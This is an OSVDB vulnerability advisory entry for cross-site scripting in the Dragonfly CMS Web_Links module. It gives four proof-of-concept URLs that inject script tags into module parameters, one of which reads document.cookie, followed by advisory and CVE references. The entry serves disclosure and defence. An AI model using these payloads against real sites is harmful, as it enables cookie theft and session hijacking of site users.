CPG Dragonfly CMS Web_Links Module Multiple Variable XSS

2006-02-22T07:17:34
ID OSVDB:23411
Type osvdb
Reporter OSVDB
Modified 2006-02-22T07:17:34

Description

Manual Testing Notes

http://[target]/index.php?name=Web_Links&l_op=viewlink&cid=15&min=10&orderby=title%20ASC&show=0"><script>alert(document.cookie)</script>
http://[target]/index.php?name=Web_Links&l_op=viewlink&cid=15"><script>alert()</script>
http://[target]/index.php?name=Web_Links&l_op=toprated&ratenum=5&ratetype=percent"><script>alert()</script>
http://[target]/index.php?name=Web_Links&l_op=viewlink&cid=15&orderby=titled"><script>alert()</script>

References:

Vendor URL: http://dragonflycms.org/
Security Tracker: 1015661
Secunia Advisory ID: 18940
Related OSVDB ID: 23408
Related OSVDB ID: 23410
Related OSVDB ID: 23409
Related OSVDB ID: 23412
Related OSVDB ID: 23413
Related OSVDB ID: 23414
Related OSVDB ID: 23415
Other Advisory URL: http://lostmon.blogspot.com/2006/02/multiple-cross-site-scripting-in.html
FrSIRT Advisory: ADV-2006-0688
CVE-2006-1033
Bugtraq ID: 16784